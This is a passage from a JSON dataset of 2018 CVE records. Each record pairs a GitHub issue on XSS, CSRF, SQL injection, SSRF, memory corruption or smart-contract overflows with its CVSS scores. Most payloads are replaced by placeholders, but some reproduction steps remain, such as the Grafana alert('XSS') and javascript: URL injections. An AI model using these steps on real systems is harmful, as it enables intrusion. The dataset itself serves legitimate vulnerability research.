  27293. "Repo_new": "jansol/lupng",
  27294. "Issue_Created_At": "2018-10-21T07:15:59Z",
  27295. "description": "Heap Buffer Overflow in Function APITAG I used clang NUMBERTAG and APITAG to build APITAG URLTAG , this file URLTAG can cause heap buffer overflow in function APITAG in lupng.c when executing this command: APITAG This is the ASAN information: ERRORTAG",
  27296. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27297. "severity": "HIGH",
  27298. "baseScore": 8.8,
  27299. "impactScore": 5.9,
  27300. "exploitabilityScore": 2.8
  27301. },
  27302. {
  27303. "CVE_ID": "CVE-2018-18599",
  27304. "Issue_Url_old": "https://github.com/abeluck/stegdetect/issues/10",
  27305. "Issue_Url_new": "https://github.com/abeluck/stegdetect/issues/10",
  27306. "Repo_new": "abeluck/stegdetect",
  27307. "Issue_Created_At": "2018-10-23T08:03:47Z",
  27308. "description": "Out of bound write. PATHTAG valgrind ./stegdetect tF PATHTAG NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./stegdetect tF PATHTAG NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG ACF5: f5_compress APITAG NUMBERTAG by NUMBERTAG BE NUMBERTAG detect_f5 APITAG NUMBERTAG by NUMBERTAG C7: detect APITAG NUMBERTAG by NUMBERTAG main APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEGV): dumping core NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG ACF5: f5_compress APITAG NUMBERTAG by NUMBERTAG BE NUMBERTAG detect_f5 APITAG NUMBERTAG by NUMBERTAG C7: detect APITAG NUMBERTAG by NUMBERTAG main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault APITAG the poc 
URLTAG",
  27309. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27310. "severity": "HIGH",
  27311. "baseScore": 8.8,
  27312. "impactScore": 5.9,
  27313. "exploitabilityScore": 2.8
  27314. },
  27315. {
  27316. "CVE_ID": "CVE-2018-18608",
  27317. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/8",
  27318. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/8",
  27319. "Repo_new": "ky-j/dedecms",
  27320. "Issue_Created_At": "2018-10-23T05:48:28Z",
  27321. "description": "Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG SP2. Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG SP2 APITAG NUMBERTAG SP2 allows XSS via the vulnerable function named APITAG defined in the file which is used to display the page numbers list at the bottom of some templates. FILETAG",
  27322. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27323. "severity": "MEDIUM",
  27324. "baseScore": 6.1,
  27325. "impactScore": 2.7,
  27326. "exploitabilityScore": 2.8
  27327. },
  27328. {
  27329. "CVE_ID": "CVE-2018-18622",
  27330. "Issue_Url_old": "https://github.com/caokang/waimai/issues/8",
  27331. "Issue_Url_new": "https://github.com/caokang/waimai/issues/8",
  27332. "Repo_new": "caokang/waimai",
  27333. "Issue_Created_At": "2018-10-23T13:31:09Z",
  27334. "description": "there is a xss. POST APITAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG Connection: close APITAG APITAG APITAG APITAG APITAG",
  27335. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27336. "severity": "MEDIUM",
  27337. "baseScore": 6.1,
  27338. "impactScore": 2.7,
  27339. "exploitabilityScore": 2.8
  27340. },
  27341. {
  27342. "CVE_ID": "CVE-2018-18623",
  27343. "Issue_Url_old": "https://github.com/grafana/grafana/issues/15293",
  27344. "Issue_Url_new": "https://github.com/grafana/grafana/issues/15293",
  27345. "Repo_new": "grafana/grafana",
  27346. "Issue_Created_At": "2019-02-07T05:48:46Z",
  27347. "description": "XSS: Option to disable or sanitize html source in some panels. Grafana is vulnerable to XSS vulnerability because the panels included in the description below can contain html. Therefore, the option to disable or filter the html source must be provided. > APITAG Component] > APITAG > Dashboard > Text Panel > > APITAG Vectors NUMBERTAG APITAG Launch NUMBERTAG Access to any dashboard NUMBERTAG Add Panel > Text NUMBERTAG Edit Text Panel NUMBERTAG Set Options > Mode(html) & Content( APITAG alert('XSS'); APITAG ) > > > > APITAG Component] > APITAG > Dashboard > Table Panel > > APITAG Vectors NUMBERTAG APITAG Launch NUMBERTAG Access to any dashboard NUMBERTAG Add Panel > Table NUMBERTAG Edit Table Panel NUMBERTAG Set Column Styles > : Check Render value as link > : set Url(javascript:alert('XSS')) > > > > APITAG Component] > APITAG > Dashboard > All Panels > General > > APITAG Vectors NUMBERTAG APITAG Launch NUMBERTAG Access to any dashboard NUMBERTAG Dashboard Settings NUMBERTAG Set dashboard name(TEST APITAG alert('XSS') APITAG NUMBERTAG Save dashboard and go back to dashboard home NUMBERTAG Edit any panel NUMBERTAG Add link, in General NUMBERTAG Write the 'TEST' on the dashboard blank >",
  27348. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27349. "severity": "MEDIUM",
  27350. "baseScore": 6.1,
  27351. "impactScore": 2.7,
  27352. "exploitabilityScore": 2.8
  27353. },
  27354. {
  27355. "CVE_ID": "CVE-2018-18628",
  27356. "Issue_Url_old": "https://github.com/pippo-java/pippo/issues/458",
  27357. "Issue_Url_new": "https://github.com/pippo-java/pippo/issues/458",
  27358. "Repo_new": "pippo-java/pippo",
  27359. "Issue_Created_At": "2018-09-30T06:16:59Z",
  27360. "description": "Java deserialization vulnerability.",
  27361. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27362. "severity": "CRITICAL",
  27363. "baseScore": 9.8,
  27364. "impactScore": 5.9,
  27365. "exploitabilityScore": 3.9
  27366. },
  27367. {
  27368. "CVE_ID": "CVE-2018-18635",
  27369. "Issue_Url_old": "https://github.com/MailCleaner/MailCleaner/issues/53",
  27370. "Issue_Url_new": "https://github.com/mailcleaner/mailcleaner/issues/53",
  27371. "Repo_new": "mailcleaner/mailcleaner",
  27372. "Issue_Created_At": "2018-10-22T11:06:56Z",
  27373. "description": "Security bug Reflected XSS. Hi, I tried to register on your forum to report this bug, but my registration request got no response. so: Bug Title: Reflected XSS Product(s): APITAG CE NUMBERTAG APITAG CE NUMBERTAG Tested on: APITAG & APITAG APITAG URI: URLTAG BR, Milad Fadavvi",
  27374. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27375. "severity": "MEDIUM",
  27376. "baseScore": 6.1,
  27377. "impactScore": 2.7,
  27378. "exploitabilityScore": 2.8
  27379. },
  27380. {
  27381. "CVE_ID": "CVE-2018-18665",
  27382. "Issue_Url_old": "https://github.com/NexxusUniversity/nexxuscoin/issues/2",
  27383. "Issue_Url_new": "https://github.com/nexxusuniversity/nexxuscoin/issues/2",
  27384. "Repo_new": "nexxusuniversity/nexxuscoin",
  27385. "Issue_Created_At": "2018-10-26T01:42:39Z",
  27386. "description": "an overflow vulnerability in APITAG hi, the APITAG function of APITAG seems to have an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value. function APITAG _amount) { if APITAG == owner) { APITAG += _amount; balances[owner] += _amount; Transfer NUMBERTAG owner, _amount); } } you can see the test of this vulnerability, plz verify, thx! (yogurt. EMAILTAG .cn)",
  27387. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  27388. "severity": "HIGH",
  27389. "baseScore": 7.5,
  27390. "impactScore": 3.6,
  27391. "exploitabilityScore": 3.9
  27392. },
  27393. {
  27394. "CVE_ID": "CVE-2018-18666",
  27395. "Issue_Url_old": "https://github.com/SwftCoins/SwftCoin/issues/1",
  27396. "Issue_Url_new": "https://github.com/swftcoins/swftcoin/issues/1",
  27397. "Repo_new": "swftcoins/swftcoin",
  27398. "Issue_Created_At": "2018-10-26T02:10:39Z",
  27399. "description": "an overflow vulnerability in APITAG . hi, the APITAG function of APITAG seems to have an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value. function APITAG target, uint NUMBERTAG APITAG APITAG { APITAG += APITAG APITAG += APITAG Transfer NUMBERTAG this, APITAG Transfer(this, target, APITAG } you can see the test of this vulnerability in FILETAG , plz verify, thx! (yogurt. EMAILTAG .cn)",
  27400. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  27401. "severity": "HIGH",
  27402. "baseScore": 7.5,
  27403. "impactScore": 3.6,
  27404. "exploitabilityScore": 3.9
  27405. },
  27406. {
  27407. "CVE_ID": "CVE-2018-18667",
  27408. "Issue_Url_old": "https://github.com/klenergy/ethereum-contracts/issues/1",
  27409. "Issue_Url_new": "https://github.com/pylondata/ethereum-contracts/issues/1",
  27410. "Repo_new": "pylondata/ethereum-contracts",
  27411. "Issue_Created_At": "2018-10-26T01:46:11Z",
  27412. "description": "an overflow vulnerability in APITAG hi, the APITAG function of APITAG seems to have an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value. function APITAG target, uint NUMBERTAG APITAG APITAG { APITAG += APITAG APITAG += APITAG Transfer NUMBERTAG owner, APITAG Transfer(owner, target, APITAG } you can see the test of this vulnerability in FILETAG , plz verify, thx! (yogurt. EMAILTAG .cn)",
  27413. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  27414. "severity": "HIGH",
  27415. "baseScore": 7.5,
  27416. "impactScore": 3.6,
  27417. "exploitabilityScore": 3.9
  27418. },
  27419. {
  27420. "CVE_ID": "CVE-2018-18694",
  27421. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/459",
  27422. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/459",
  27423. "Repo_new": "monstra-cms/monstra",
  27424. "Issue_Created_At": "2018-10-25T05:07:12Z",
  27425. "description": "Monstra NUMBERTAG has Stored XSS via Uploading html file that has no extension.. Brief of this vulnerability In the uploading process, the Monstra file filter allows uploading a file with no extension. If an html file has no extension, it can be executed in the browser as html, and this causes Stored XSS. Test Environment APITAG APITAG PHP NUMBERTAG APITAG (cli) Affected version APITAG xss.) It can be executed in browser(I tested in Chrome ver NUMBERTAG APITAG Build NUMBERTAG bit)) as html and APITAG It can be executed in the browser as html, and this causes Stored XSS.",
  27426. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27427. "severity": "MEDIUM",
  27428. "baseScore": 4.8,
  27429. "impactScore": 2.7,
  27430. "exploitabilityScore": 1.7
  27431. },
  27432. {
  27433. "CVE_ID": "CVE-2018-18699",
  27434. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/43",
  27435. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/43",
  27436. "Repo_new": "gopro/gpmf-parser",
  27437. "Issue_Created_At": "2018-10-27T06:42:47Z",
  27438. "description": "OOB write. use the demo code and find a OOB write bug in APITAG NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./gpmfdemo APITAG NUMBERTAG Warning: set address range perms: large range FILETAG",
  27439. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27440. "severity": "HIGH",
  27441. "baseScore": 8.8,
  27442. "impactScore": 5.9,
  27443. "exploitabilityScore": 2.8
  27444. },
  27445. {
  27446. "CVE_ID": "CVE-2018-18702",
  27447. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/42",
  27448. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/42",
  27449. "Repo_new": "idreamsoft/iCMS",
  27450. "Issue_Created_At": "2018-10-23T15:12:36Z",
  27451. "description": "I found a SQL injection vulnerability. Vulnerabilities are generated in the background FILETAG If you have permission, we can use the injection to achieve file reading, and write the poc as follows ERRORTAG",
  27452. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27453. "severity": "CRITICAL",
  27454. "baseScore": 9.8,
  27455. "impactScore": 5.9,
  27456. "exploitabilityScore": 3.9
  27457. },
  27458. {
  27459. "CVE_ID": "CVE-2018-18711",
  27460. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/156",
  27461. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/156",
  27462. "Repo_new": "wuzhicms/wuzhicms",
  27463. "Issue_Created_At": "2018-10-25T14:48:23Z",
  27464. "description": "Two CSRF vulnerabilities that can change the super administrator's username and password. When the super administrator (uid NUMBERTAG is logged in, there are NUMBERTAG important POST methods without CSRF protection that can change his username and password respectively. This can be achieved by tricking the super administrator into opening the NUMBERTAG pages while he is logged in. APITAG APITAG the username to 'hacker') ERRORTAG APITAG APITAG the password to NUMBERTAG ERRORTAG Or we made only NUMBERTAG page POC to make it easy to attack. APITAG ERRORTAG",
  27465. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27466. "severity": "HIGH",
  27467. "baseScore": 8.8,
  27468. "impactScore": 5.9,
  27469. "exploitabilityScore": 2.8
  27470. },
  27471. {
  27472. "CVE_ID": "CVE-2018-18717",
  27473. "Issue_Url_old": "https://github.com/Sunvas/Eleanor-CMS/issues/5",
  27474. "Issue_Url_new": "https://github.com/sunvas/eleanor-cms/issues/5",
  27475. "Repo_new": "sunvas/eleanor-cms",
  27476. "Issue_Created_At": "2018-10-24T03:12:33Z",
  27477. "description": "APITAG Site Scripting Vulnerability. Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in might allow query pic then you can inject arbitrary web script or HTML via the multiple parameters. Steps To Reproduce NUMBERTAG login to administrator panel. APITAG below URL in browser which supports flash. URLTAG Fix: check the uploaded url.",
  27478. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27479. "severity": "MEDIUM",
  27480. "baseScore": 4.8,
  27481. "impactScore": 2.7,
  27482. "exploitabilityScore": 1.7
  27483. },
  27484. {
  27485. "CVE_ID": "CVE-2018-18720",
  27486. "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/2",
  27487. "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/2",
  27488. "Repo_new": "source-trace/yunucms",
  27489. "Issue_Created_At": "2018-10-25T07:00:34Z",
  27490. "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG FILETAG insert POC FILETAG click on the submit button and come back to the homepage FILETAG",
  27491. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27492. "severity": "MEDIUM",
  27493. "baseScore": 4.8,
  27494. "impactScore": 2.7,
  27495. "exploitabilityScore": 1.7
  27496. },
  27497. {
  27498. "CVE_ID": "CVE-2018-18722",
  27499. "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/6",
  27500. "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/6",
  27501. "Repo_new": "source-trace/yunucms",
  27502. "Issue_Created_At": "2018-10-25T08:18:25Z",
  27503. "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG button to edit FILETAG NUMBERTAG insert POC and click on the submit button FILETAG APITAG FILETAG",
  27504. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27505. "severity": "MEDIUM",
  27506. "baseScore": 4.8,
  27507. "impactScore": 2.7,
  27508. "exploitabilityScore": 1.7
  27509. },
  27510. {
  27511. "CVE_ID": "CVE-2018-18723",
  27512. "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/3",
  27513. "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/3",
  27514. "Repo_new": "source-trace/yunucms",
  27515. "Issue_Created_At": "2018-10-25T07:37:42Z",
  27516. "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG button to edit FILETAG NUMBERTAG insert POC and click on the submit button FILETAG APITAG FILETAG APITAG back to the homepage FILETAG",
  27517. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27518. "severity": "MEDIUM",
  27519. "baseScore": 4.8,
  27520. "impactScore": 2.7,
  27521. "exploitabilityScore": 1.7
  27522. },
  27523. {
  27524. "CVE_ID": "CVE-2018-18724",
  27525. "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/5",
  27526. "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/5",
  27527. "Repo_new": "source-trace/yunucms",
  27528. "Issue_Created_At": "2018-10-25T07:57:53Z",
  27529. "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG code FILETAG APITAG on the submit button and refresh FILETAG",
  27530. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27531. "severity": "MEDIUM",
  27532. "baseScore": 4.8,
  27533. "impactScore": 2.7,
  27534. "exploitabilityScore": 1.7
  27535. },
  27536. {
  27537. "CVE_ID": "CVE-2018-18725",
  27538. "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/4",
  27539. "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/4",
  27540. "Repo_new": "source-trace/yunucms",
  27541. "Issue_Created_At": "2018-10-25T07:47:30Z",
  27542. "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG button to edit and insert POC FILETAG APITAG on the submit button and refresh FILETAG",
  27543. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27544. "severity": "MEDIUM",
  27545. "baseScore": 4.8,
  27546. "impactScore": 2.7,
  27547. "exploitabilityScore": 1.7
  27548. },
  27549. {
  27550. "CVE_ID": "CVE-2018-18726",
  27551. "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/8",
  27552. "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/8",
  27553. "Repo_new": "source-trace/yunucms",
  27554. "Issue_Created_At": "2018-10-25T08:30:27Z",
  27555. "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG button to edit and insert code FILETAG APITAG on the submit button and refresh FILETAG",
  27556. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27557. "severity": "MEDIUM",
  27558. "baseScore": 4.8,
  27559. "impactScore": 2.7,
  27560. "exploitabilityScore": 1.7
  27561. },
  27562. {
  27563. "CVE_ID": "CVE-2018-18749",
  27564. "Issue_Url_old": "https://github.com/clarkgrubb/data-tools/issues/7",
  27565. "Issue_Url_new": "https://github.com/clarkgrubb/data-tools/issues/7",
  27566. "Repo_new": "clarkgrubb/data-tools",
  27567. "Issue_Created_At": "2018-10-26T03:17:54Z",
  27568. "description": "integer overflow. In the function tab to csv of tab to csv.c, when calling write_wchars, the argument end passed to write_wchars can overflow due to the operation APITAG, which will cause a APITAG APITAG poc URLTAG",
  27569. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  27570. "severity": "MEDIUM",
  27571. "baseScore": 5.5,
  27572. "impactScore": 3.6,
  27573. "exploitabilityScore": 1.8
  27574. },
  27575. {
  27576. "CVE_ID": "CVE-2018-18771",
  27577. "Issue_Url_old": "https://github.com/yiifans/lulucms/issues/6",
  27578. "Issue_Url_new": "https://github.com/yiifans/lulucms/issues/6",
  27579. "Repo_new": "yiifans/lulucms",
  27580. "Issue_Created_At": "2018-10-24T07:48:59Z",
  27581. "description": "PATHTAG There is an arbitrary file upload vulnerability.. FILETAG FILETAG FILETAG",
  27582. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  27583. "severity": "HIGH",
  27584. "baseScore": 7.5,
  27585. "impactScore": 3.6,
  27586. "exploitabilityScore": 3.9
  27587. },
  27588. {
  27589. "CVE_ID": "CVE-2018-18781",
  27590. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/9",
  27591. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/9",
  27592. "Repo_new": "ky-j/dedecms",
  27593. "Issue_Created_At": "2018-10-24T07:06:45Z",
  27594. "description": "Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG SP2. APITAG NUMBERTAG SP2 allows XSS via the FILETAG f & keyword parameter. FILETAG Phink APITAG",
  27595. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27596. "severity": "MEDIUM",
  27597. "baseScore": 6.1,
  27598. "impactScore": 2.7,
  27599. "exploitabilityScore": 2.8
  27600. },
  27601. {
  27602. "CVE_ID": "CVE-2018-18782",
  27603. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/10",
  27604. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/10",
  27605. "Repo_new": "ky-j/dedecms",
  27606. "Issue_Created_At": "2018-10-24T07:10:43Z",
  27607. "description": "Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG SP2. Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG SP2 Reflected XSS exists in APITAG NUMBERTAG SP2 via the FILETAG ftype parameter. FILETAG Phink APITAG",
  27608. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27609. "severity": "MEDIUM",
  27610. "baseScore": 6.1,
  27611. "impactScore": 2.7,
  27612. "exploitabilityScore": 2.8
  27613. },
  27614. {
  27615. "CVE_ID": "CVE-2018-18842",
  27616. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/201",
  27617. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/201",
  27618. "Repo_new": "zblogcn/zblogphp",
  27619. "Issue_Created_At": "2018-10-29T10:32:39Z",
  27620. "description": "CSRF Vulnerability exists in the file of Z BLOG NUMBERTAG CSRF Vulnerability exists in the file of Z BLOG NUMBERTAG APITAG URLTAG \u4e00\u4e9b\u6587\u4ef6\u53ef\u4ee5\u76f4\u63a5\u8bbf\u95ee\u4f1a\u5bfc\u81f4csrf_token\u6cc4\u6f0f\u3002 PATHTAG APITAG FILETAG APITAG FILETAG FILETAG",
  27621. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27622. "severity": "HIGH",
  27623. "baseScore": 8.8,
  27624. "impactScore": 5.9,
  27625. "exploitabilityScore": 2.8
  27626. },
  27627. {
  27628. "CVE_ID": "CVE-2018-18850",
  27629. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5042",
  27630. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5042",
  27631. "Repo_new": "octopusdeploy/issues",
  27632. "Issue_Created_At": "2018-10-30T22:40:58Z",
  27633. "description": "Remote Code Execution via malicious YAML configurations in some versions. Description An authenticated user with permission to modify deployment processes could upload a maliciously crafted YAML configuration, potentially allowing for remote execution of arbitrary code, running in the same context as the Octopus Server (for self hosted installations by default, SYSTEM). If this issue is of concern to you and your team, we strongly recommend upgrading to version APITAG . CVE ID Pending Affected versions Octopus Server: versions NUMBERTAG APITAG inclusive. Mitigation In any version affected by this issue, we recommend upgrading to version APITAG . Workarounds In situations where upgrade is not possible, running the octopus server built in worker as a service account with limited privileges may help to minimize the potential impact of such an occurrence, however this will not prevent attackers from attempting to chain other attacks against the server. URLTAG URLTAG",
  27634. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  27635. "severity": "HIGH",
  27636. "baseScore": 8.8,
  27637. "impactScore": 5.9,
  27638. "exploitabilityScore": 2.8
  27639. },
  27640. {
  27641. "CVE_ID": "CVE-2018-18853",
  27642. "Issue_Url_old": "https://github.com/spray/spray-json/issues/278",
  27643. "Issue_Url_new": "https://github.com/spray/spray-json/issues/278",
  27644. "Repo_new": "spray/spray-json",
  27645. "Issue_Created_At": "2018-10-15T16:06:17Z",
  27646. "description": "Denial of service when parsing a JSON object with an unexpected field that has a big number. APITAG quadratic_ decreasing of throughput when length of the JSON object is increasing On contemporary CPUs parsing of such JSON object with an additional field that has of NUMBERTAG decimal digits NUMBERTAG Mb) can took more than NUMBERTAG seconds: ERRORTAG Reproducible Test Case To run that benchmarks on your JDK NUMBERTAG FILETAG and/or ensure that it already installed properly: sbt about NUMBERTAG Clone APITAG repo: APITAG NUMBERTAG Enter to the cloned directory and checkout for the specific branch: APITAG NUMBERTAG Run benchmarks using a path parameter to your JDK: APITAG",
  27647. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  27648. "severity": "HIGH",
  27649. "baseScore": 7.5,
  27650. "impactScore": 3.6,
  27651. "exploitabilityScore": 3.9
  27652. },
  27653. {
  27654. "CVE_ID": "CVE-2018-18854",
  27655. "Issue_Url_old": "https://github.com/spray/spray-json/issues/277",
  27656. "Issue_Url_new": "https://github.com/spray/spray-json/issues/277",
  27657. "Repo_new": "spray/spray-json",
  27658. "Issue_Created_At": "2018-10-15T15:46:03Z",
  27659. "description": "Denial of service when parsing JSON object with keys that have the same hash code. APITAG quadratic_ decreasing of throughput when number of JSON object fields (with keys that have the same hash code) is increasing On contemporary CPUs parsing of such JSON object (with a sequence of NUMBERTAG fields like below that is NUMBERTAG Mb) can took more than NUMBERTAG seconds: APITAG Below are results of the benchmark where size is a number of such fields: ERRORTAG Reproducible Test Case To run that benchmarks on your JDK NUMBERTAG FILETAG and/or ensure that it already installed properly: sbt about NUMBERTAG Clone APITAG repo: APITAG NUMBERTAG Enter to the cloned directory and checkout for the specific branch: APITAG NUMBERTAG Run benchmarks using a path parameter to your JDK: APITAG",
  27660. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  27661. "severity": "HIGH",
  27662. "baseScore": 7.5,
  27663. "impactScore": 3.6,
  27664. "exploitabilityScore": 3.9
  27665. },
  27666. {
  27667. "CVE_ID": "CVE-2018-18867",
  27668. "Issue_Url_old": "https://github.com/trippo/ResponsiveFilemanager/issues/506",
  27669. "Issue_Url_new": "https://github.com/trippo/responsivefilemanager/issues/506",
  27670. "Repo_new": "trippo/responsivefilemanager",
  27671. "Issue_Created_At": "2018-10-30T09:42:28Z",
  27672. "description": "SSRF not been fully fixed in FILETAG . In FILETAG we can download a pic in remote server. code in line NUMBERTAG Jul NUMBERTAG commit a fix to limit url in order to prohibit ssrf vuln CVETAG CVETAG but the fix only check the parm url startwith http:// or https:// we still can use http protocol to Probe intranet and attack intranet APITAG Example: CODETAG and when the port is open will response APITAG URL\"} FILETAG",
  27673. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  27674. "severity": "HIGH",
  27675. "baseScore": 8.6,
  27676. "impactScore": 4.0,
  27677. "exploitabilityScore": 3.9
  27678. },
  27679. {
